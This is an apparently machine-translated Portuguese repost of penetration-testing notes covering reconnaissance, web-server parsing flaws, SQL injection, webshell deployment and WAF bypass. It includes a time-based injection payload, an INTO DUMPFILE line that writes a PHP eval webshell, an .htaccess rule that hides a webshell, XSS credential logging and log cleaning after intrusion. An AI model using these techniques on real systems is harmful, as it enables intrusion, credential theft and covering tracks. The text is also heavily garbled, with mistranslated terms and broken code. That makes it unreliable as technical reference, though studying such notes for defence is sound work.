Penetração de conhecimento

Penetração de conhecimento

1. Recolha de Informação

whois, website IP, junto à estação, segmento C, a versão do servidor, uma versão recipiente, versão serviço, tipo de banco de dados, nomes de dois de domínio, firewall,

2.Mysql local da injeção, mais de 5,0 e 5,0 ou menos Qual é a diferença?

5.0 A tabela a seguir não é information_schema este sistema não pode lista mostra que só a violência nome cronômetro, é uma operação de um único usuário, mais de 5,0 é um multi-usuário

3 para determinar o significado da CMS

Eles podem encontrar a auditoria de código fonte correspondente, a vulnerabilidade pode ir à biblioteca para encontrar a exposição correspondente de vulnerabilidades.

diretório varredura significado

arquivos sensíveis, dois diretórios de varredura (fonte de backup local, indicando .tx, pode haver outros locais do diretório secundário

recipiente de 5 Serviços Web comum

IIS, Apache, nginx, Lighttpd, Tomcat

6. vulnerabilidade de análise

1.IIS6.0

/xx.asp/xx.jpg "xx.asp" é o nome da pasta

2 IIS7.0 / 7,5

Fast-CGI é ativado por padrão, /1.php entrada direta na imagem após a url endereço, php irá analisar como uma imagem normal

3 Nginx

Versão 0.8.37 ou menos, usando o método e o IIS 7.0 / 7.5, como o caso fechado Fast-CGI também podem ser utilizados. byte nulo xxx.jpg.php código

4Apache

Fazer o upload do arquivo é chamado: test.php.x1.x2.x3, Apache é da direita para a esquerda para determinar o sufixo

7RDP não unir solução de problemas

Sem aberto 3389 (varredura de portas)

Porto é modificado (há circunstâncias sob webshel: ltasklist / svc | findstr "TermService" encontrado TermService processo ID, em seguida, executar o mesmo correspondente "netstat -ano" encontrar o ID do processo do número de porta)

interceptação de proteção (tentar evitar matar controle remoto mencionar à direita)

Ambiente no interior da rede (o encaminhamento de porta: LCX REGEORG NC, etc.)

8 injeção caractere de escape pausa

código Hex injeção byte largura Anuladas

O que podemos fazer 9webshell.htaccess arquivo

cavalo escondido

    <FilesMatch "xxx.jpg"> aplicação SetHandler / x-httpd-php </ FilesMatch>

Desta vez será analisado em .jpg .php

Por que pode injetar 10

Ver inventário senha de administrador de dados para trás para ver se você pode tirar proveito do fundo (upload de arquivos, etc.)

Se a autoridade DBA pode gravar arquivos diretamente slqmap

acesso root para a senha de banco de dados (se for), você pode tentar Phpmyadmin get WebShell

11. Carregar Malásia ilegível

problema de codificação do navegador

12 No caso da casca, como usar XSS conseguir o controle a longo prazo da estação de destino?

js adicionar alguns registros de login senha da conta para um registro TXT em (lembre-se verdadeiro ou falso)

13 falha lógica

Esqueceu a senha

Vulnerabilidade código

brecha único Top

vulnerabilidades de autenticação

14 um site, como fazer

Coleta de Informações (CMS editor de banco de dados do sistema do servidor de subdomínio porta diretório whois) para encontrar a versão correspondente [então] lacunas

detecção de vulnerabilidade (XSS arquivo não autorizado a execução de código injeção CSRF SQL contém etc.)

Explorar (get WebShell maneira descrita acima)

direito de venda

Windwos Serv-u mencionar o UDF direito mencionar o direito barbecue II6 brasileira CVE-2018-8120, etc.

LINUX posse de gado (lembre-se de passwd backup) do kernel escalação de privilégios, etc.

Limpeza de log

relatórios de bugs e reparação

função de injeção de erro sql

extractvalue updatexml GeometryCollection () multiponto .polygon multilinha exp linestring

Injeção de atraso

 se (ASCII (substr ( “Olá”, 1, 1)) = 104, o sono (5), 1)

ficheiro de gravação sql

selecione 'palavra' no arquivo de saída 'caminho' 
selecionar 'palavra' em dumpfile 'caminho'
selecionar '<PHP o eval (o POST $ _ [1].) ??>' em dumpfile 'D: \ wwwroot \ Baidu.com \ nvhack. php ';

defesa de injeção SQL

1, o uso de segurança da API 2, caracteres especiais inseridos fuga escapar 3, whitelist método de validação para normalizar a entrada 4, a entrada do cliente de controle não é permitido para inserir o caractere especial associado a injeção de SQL 5, o servidor antes de enviar consultas de banco de dados SQL, filtragem de caracteres especiais, escape, substituir, excluir.

a execução de código, leia o arquivo, a função de execução de comandos

1, a execução de código: o eval, preg_replace + / E, Assert, também call_user_func, call_user_func_array, create_function 2, arquivo lê: file_get_contents (), highlight_file () , fopen (), arquivo Read (), fread (), fgetss (),

3, o comando: sistema (), exec (), shell_exec (), intermediário (), pcntl_exec (), popen (), proc_open ()

Waf desvio

Injeção de SQL

1, você pode usar a palavra-chave% (IIS série apenas).

2, por meio da matança, comentários incorporados.

3, a codificação.

4. Copie elaborar

Carregar arquivo

1. Uma embalagem de uma cópia 2. Na forma-dados; posteriormente aumentado por um certo carácter

###

 

Acho que você gosta

Origin www.cnblogs.com/8gman/p/12657534.html
Recomendado
Clasificación